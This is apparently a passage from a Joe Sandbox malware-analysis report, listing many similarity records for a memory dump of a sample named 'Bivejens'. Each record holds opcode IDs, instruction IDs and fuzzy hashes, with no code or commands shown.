                                                                                                                          • API String ID: 0-3553790735
                                                                                                                          • Opcode ID: c1141957a28550ad808cbea2636a86dc38ae66d5b9d546d54102f93cbc917364
                                                                                                                          • Instruction ID: 52e56a5d52bf00677c896f58bcab23b338a7263a65bb37394853a3fb4fd342bd
                                                                                                                          • Opcode Fuzzy Hash: c1141957a28550ad808cbea2636a86dc38ae66d5b9d546d54102f93cbc917364
                                                                                                                          • Instruction Fuzzy Hash: 3C52AC74E01228CFDB64DF65C890B9DBBB2BF89300F1081EAD849AB255DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e52add1b3d2126d80e0b27137f20a7967d7091c35f4385a4c93f5cd00cf415b9
                                                                                                                          • Instruction ID: d80bc1e9b79fe0cd20c0dfab6bc8d8440ada205d5b77a63e99e6848fd054f107
                                                                                                                          • Opcode Fuzzy Hash: e52add1b3d2126d80e0b27137f20a7967d7091c35f4385a4c93f5cd00cf415b9
                                                                                                                          • Instruction Fuzzy Hash: 77D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9fa13c06bca4c6a19a6ad1b301bbf20facb0463959646a85b619867a8695a4f0
                                                                                                                          • Instruction ID: 615347e1f6f4ac7aad745173e19201bb928f236192bc791e2f6b99106a1d35b4
                                                                                                                          • Opcode Fuzzy Hash: 9fa13c06bca4c6a19a6ad1b301bbf20facb0463959646a85b619867a8695a4f0
                                                                                                                          • Instruction Fuzzy Hash: 7DD19374E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 625648bfbd0a974075c1bee72651614818777e40b0cbe8c856ff9a24abcbb46c
                                                                                                                          • Instruction ID: 61d110e47840de252b758f3d36f5f4f3b8b980f878b9bf5b3ea1588f1622acd7
                                                                                                                          • Opcode Fuzzy Hash: 625648bfbd0a974075c1bee72651614818777e40b0cbe8c856ff9a24abcbb46c
                                                                                                                          • Instruction Fuzzy Hash: 08D19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: ebbdb9726ee62080c80f66372767e080b7415f97f1fd991bc8cfc9c53da6707b
                                                                                                                          • Instruction ID: 46ced174ea7ab5c9e2d283095f1a7737ee91d43e47c49fe9939677b654ade337
                                                                                                                          • Opcode Fuzzy Hash: ebbdb9726ee62080c80f66372767e080b7415f97f1fd991bc8cfc9c53da6707b
                                                                                                                          • Instruction Fuzzy Hash: A8D19274E01228CFEB54DFA5C994B9DBBB2BF89300F5081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d8010210b5b847a5b6dcdfdd891c94e6997431e3f67698c70b2f900a7e66baac
                                                                                                                          • Instruction ID: 357691c5788c4186cb07e56518c61d6941c204c2b6ec76bf3dcfbc3d5e7af18a
                                                                                                                          • Opcode Fuzzy Hash: d8010210b5b847a5b6dcdfdd891c94e6997431e3f67698c70b2f900a7e66baac
                                                                                                                          • Instruction Fuzzy Hash: BFD19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5edde2e20ac3a89ccd84767dbc745b110544ff079d168f493db0dd5b432218c8
                                                                                                                          • Instruction ID: adb61decddd433f8b708272f9b6253f22dafd39bafe2ce7b2dddfbdce601a07c
                                                                                                                          • Opcode Fuzzy Hash: 5edde2e20ac3a89ccd84767dbc745b110544ff079d168f493db0dd5b432218c8
                                                                                                                          • Instruction Fuzzy Hash: 7DD18274E01228CFEB54DFA5C994B9DBBB2BF89300F5081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05981067ab57ca585c58a76ba6416d549515dabe1933151cdf99f9831c8bab89
                                                                                                                          • Instruction ID: 0b2e6660079fbe6fc8add761098faf523f57f9136c10c4abd8c705b61ae3410f
                                                                                                                          • Opcode Fuzzy Hash: 05981067ab57ca585c58a76ba6416d549515dabe1933151cdf99f9831c8bab89
                                                                                                                          • Instruction Fuzzy Hash: 1CD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 04b7292fb4178078b28980311af310321a9c3398cef60b209162ab5904a0a031
                                                                                                                          • Instruction ID: 3d4c7e00d7cfa24d5fa6e8f92521e8bbbe3547f2e71209251cf4531f912f38c1
                                                                                                                          • Opcode Fuzzy Hash: 04b7292fb4178078b28980311af310321a9c3398cef60b209162ab5904a0a031
                                                                                                                          • Instruction Fuzzy Hash: 0ED19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 638611f5296009276603ad9f1bc120ff5698b7c1b6fb33ba8dd0627c4bfedfbb
                                                                                                                          • Instruction ID: 8005a92c938e99bb7ebf06d3c938273555b97e2fbaf5ea85aa98f9b7d3ef5744
                                                                                                                          • Opcode Fuzzy Hash: 638611f5296009276603ad9f1bc120ff5698b7c1b6fb33ba8dd0627c4bfedfbb
                                                                                                                          • Instruction Fuzzy Hash: E6D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b2a05f5b24c9b0de6195f7f27b6e59646cc63021fa2e1b2621e86d53f9458bbb
                                                                                                                          • Instruction ID: bc6e2053e98a0e5cb2372f613b8083c18a78843f20cdefde8fede61762454d2d
                                                                                                                          • Opcode Fuzzy Hash: b2a05f5b24c9b0de6195f7f27b6e59646cc63021fa2e1b2621e86d53f9458bbb
                                                                                                                          • Instruction Fuzzy Hash: 63D1A174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f87d4bef7d759cdb7b9ae6ac88143b0eab31b2a8c74e36849e0d98b891bb9dc1
                                                                                                                          • Instruction ID: d7780c721cbbf7c43521cf28d40f182cd82b5457b362fa167e50e902e09b56d0
                                                                                                                          • Opcode Fuzzy Hash: f87d4bef7d759cdb7b9ae6ac88143b0eab31b2a8c74e36849e0d98b891bb9dc1
                                                                                                                          • Instruction Fuzzy Hash: C0D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 611102e16db262b0c7e78209cea9f1524056af67a9b80154d1fd8b0ffb6c708d
                                                                                                                          • Instruction ID: 8fa93838724baa1cde42f723197f52a51fc0c82c197f89c0981afbc045ce27de
                                                                                                                          • Opcode Fuzzy Hash: 611102e16db262b0c7e78209cea9f1524056af67a9b80154d1fd8b0ffb6c708d
                                                                                                                          • Instruction Fuzzy Hash: F7D19074E01228CFEB54DFA5C994B9DBBB2BF89300F2481A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 22106e4bcb87e2985af4d51b71157870231e2d113de1b4247c88e073d613d77a
                                                                                                                          • Instruction ID: abd19dcbbbc77b0a3700e133eda6b92bd2eec81ddb1b3b2b21b79249e95c0076
                                                                                                                          • Opcode Fuzzy Hash: 22106e4bcb87e2985af4d51b71157870231e2d113de1b4247c88e073d613d77a
                                                                                                                          • Instruction Fuzzy Hash: BAD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b1b9453d731e0940372da89900874843aa38ee1af17dbaa2932639a16c7be0b8
                                                                                                                          • Instruction ID: e9ae9308f4ef9f750aadc463b01f6fd0400ac24ffe95c86ba16f83f62327854a
                                                                                                                          • Opcode Fuzzy Hash: b1b9453d731e0940372da89900874843aa38ee1af17dbaa2932639a16c7be0b8
                                                                                                                          • Instruction Fuzzy Hash: 6ED19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 5c0f31d7dbef46b2ebd79e6605887ce2f516ec45b99f4bcc43c33e7dabfb2484
                                                                                                                          • Instruction ID: c0873fffc1e36e4721967299d6c0d533464dfdb8028f0e1daa0fdc9bd36f272a
                                                                                                                          • Opcode Fuzzy Hash: 5c0f31d7dbef46b2ebd79e6605887ce2f516ec45b99f4bcc43c33e7dabfb2484
                                                                                                                          • Instruction Fuzzy Hash: EED19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f66a772e412cf9b33e9eb1cd1bbf0601f755ee31ad33a9c93ee02e5a9294ceb8
                                                                                                                          • Instruction ID: b5e0cea50dbd59995e445bb0cf9d328d82609a97e1e5ed843bcd7a00a1756d1f
                                                                                                                          • Opcode Fuzzy Hash: f66a772e412cf9b33e9eb1cd1bbf0601f755ee31ad33a9c93ee02e5a9294ceb8
                                                                                                                          • Instruction Fuzzy Hash: 7ED19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 05eae4aa1d5e431b8109e6a77bbae1b768e38e9691ff327fe67ce48642ff534f
                                                                                                                          • Instruction ID: 117d39b5658bb01e973d4f6dafa074880b194aa49e8b145bb879305de2f0dc6a
                                                                                                                          • Opcode Fuzzy Hash: 05eae4aa1d5e431b8109e6a77bbae1b768e38e9691ff327fe67ce48642ff534f
                                                                                                                          • Instruction Fuzzy Hash: E3D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a7b4d5910dc9d9b9cb3215aa05a9c4ccb782903b2b6eb584c371a4ca3fdc4c8b
                                                                                                                          • Instruction ID: 586eb6e016e008deb6bb868f7a8b6a6466f2d727faba771119a4f74c8060afa6
                                                                                                                          • Opcode Fuzzy Hash: a7b4d5910dc9d9b9cb3215aa05a9c4ccb782903b2b6eb584c371a4ca3fdc4c8b
                                                                                                                          • Instruction Fuzzy Hash: 1FD19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 59ba3a9515797a5df6a9988b57c11b9606f38ae3a782ac532ebcaaec5e427fb7
                                                                                                                          • Instruction ID: 8abdfd3e59ca1e1602a627981bfcf13a395d60fcb6590b458f9fb3ad3a900b9b
                                                                                                                          • Opcode Fuzzy Hash: 59ba3a9515797a5df6a9988b57c11b9606f38ae3a782ac532ebcaaec5e427fb7
                                                                                                                          • Instruction Fuzzy Hash: 5FD1A274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 618d0e7179a7ba1181768c02908aeb54f14944d2a1236d15967d463765559240
                                                                                                                          • Instruction ID: 8a6d7c64bb56f5422aaca7aaa9d4c9b2a7b5fd85254d882839145954012e5a1b
                                                                                                                          • Opcode Fuzzy Hash: 618d0e7179a7ba1181768c02908aeb54f14944d2a1236d15967d463765559240
                                                                                                                          • Instruction Fuzzy Hash: 0FD18074E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0121a6947e043bef06af98812e1df5f09d08b74b6d7aac3e2cae983ce153720e
                                                                                                                          • Instruction ID: bd6df959bab715086c2f51f045422e82d61317ad9aa087a2bdf19bf16ecdcb4f
                                                                                                                          • Opcode Fuzzy Hash: 0121a6947e043bef06af98812e1df5f09d08b74b6d7aac3e2cae983ce153720e
                                                                                                                          • Instruction Fuzzy Hash: 71D19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 9676f7dcbaf2a884f74c8186e8fa18173ce4beb2ef22dcaf1730cd056285a31d
                                                                                                                          • Instruction ID: 7a053dbc2f9d7dfdf5b222024c63544225a4f2e80a22e31096f309a5d3a9887f
                                                                                                                          • Opcode Fuzzy Hash: 9676f7dcbaf2a884f74c8186e8fa18173ce4beb2ef22dcaf1730cd056285a31d
                                                                                                                          • Instruction Fuzzy Hash: 2ED19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a32804c8caf2cd160fddf1711e328f59d72ddc470a21a27c61601970f32f103f
                                                                                                                          • Instruction ID: 2e593bb33c4347a633ae653873a8234172a84509682fe96596c1359391c3705a
                                                                                                                          • Opcode Fuzzy Hash: a32804c8caf2cd160fddf1711e328f59d72ddc470a21a27c61601970f32f103f
                                                                                                                          • Instruction Fuzzy Hash: CFD19174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 400c912fa66d6c77f3c760e8e385119dc1243815937215b3c8005f989889ee71
                                                                                                                          • Instruction ID: 8a1b78c8f1110d39573fbf9610850c842734810409634fc84d552e3a45e0d15e
                                                                                                                          • Opcode Fuzzy Hash: 400c912fa66d6c77f3c760e8e385119dc1243815937215b3c8005f989889ee71
                                                                                                                          • Instruction Fuzzy Hash: 82D1A274E01228CFEB54DFA5C994B9DBBB2BF89300F2081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4497c2176ead3c2c3842b7964d3f32377eeac1e5f6796948391f58199870a157
                                                                                                                          • Instruction ID: d27f2c494f9f121129297cf55d7b47822974e1d24fca45c5f9b920a07f135a97
                                                                                                                          • Opcode Fuzzy Hash: 4497c2176ead3c2c3842b7964d3f32377eeac1e5f6796948391f58199870a157
                                                                                                                          • Instruction Fuzzy Hash: C2D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f0fc977d13db857c935f1d0e232402ac46f5971050203e373639a263fb784836
                                                                                                                          • Instruction ID: e63d3a36e0292e483283c991c5202d39f45d8c8677da45ec223f4899db139e40
                                                                                                                          • Opcode Fuzzy Hash: f0fc977d13db857c935f1d0e232402ac46f5971050203e373639a263fb784836
                                                                                                                          • Instruction Fuzzy Hash: 63D19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e75a36c2679cd896ab3777879f57a727dba122fd56c61641734272c617d59df9
                                                                                                                          • Instruction ID: feffd629270cc6d6a8b3fb4be2b960d000ca7f76f79c74421fec431ea34ecec3
                                                                                                                          • Opcode Fuzzy Hash: e75a36c2679cd896ab3777879f57a727dba122fd56c61641734272c617d59df9
                                                                                                                          • Instruction Fuzzy Hash: 30D18174E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7c086634b6860fbba7462545ab50674b63a0db383b7dd0366f8f54af4c96b1ae
                                                                                                                          • Instruction ID: 6070b2b8ebd37e9ece1e8515ca0760a44e6fb56c5f940f8ede4fc366c30cbd70
                                                                                                                          • Opcode Fuzzy Hash: 7c086634b6860fbba7462545ab50674b63a0db383b7dd0366f8f54af4c96b1ae
                                                                                                                          • Instruction Fuzzy Hash: B0D19074E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 6a2f9432044def236846e2847e30d8a4e6a8af5d1575ace8c3386bfa9d0f1b46
                                                                                                                          • Instruction ID: 0fdb15735471333db49dbfea2bcc0a755feccdee24973ff8d423af4714619dd5
                                                                                                                          • Opcode Fuzzy Hash: 6a2f9432044def236846e2847e30d8a4e6a8af5d1575ace8c3386bfa9d0f1b46
                                                                                                                          • Instruction Fuzzy Hash: 12D19274E01228CFEB54DFA5C994B9DBBB2BF89300F6081A9D409AB355DB359E81CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 0cec64e821befcd84afd36bc8f4f631a0a22c4586541532215491609ca15eb0c
                                                                                                                          • Instruction ID: 795f150bd867272fb598a39e8b1d839a7142f5fa0bc74062365a8597979a4472
                                                                                                                          • Opcode Fuzzy Hash: 0cec64e821befcd84afd36bc8f4f631a0a22c4586541532215491609ca15eb0c
                                                                                                                          • Instruction Fuzzy Hash: 5AD1A274E01228CFEB54DFA5C994B9DBBB2BF89300F1081A9D409AB355DB359E85CF50
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: e68e70e53c0420e2f5a29258d5906d91b362860afc823669430d3216a6562d79
                                                                                                                          • Instruction ID: c27ee229be98dfdfe7a149d5a72988e39582fb6253f895fc1260cea869d9d032
                                                                                                                          • Opcode Fuzzy Hash: e68e70e53c0420e2f5a29258d5906d91b362860afc823669430d3216a6562d79
                                                                                                                          • Instruction Fuzzy Hash: E5D1BF74E00228CFEB15DFA5C990B9DBBB2BF89300F5080A9D849AB355DB719E85CF51
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.2617704881.0000000021980000.00000040.00000800.00020000.00000000.sdmp, Offset: 21980000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_5_2_21980000_Bivejens.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a3fd64973296b27b1755bf9fef5d6987734d7bea9852f4a1f6a8898de1657e9c
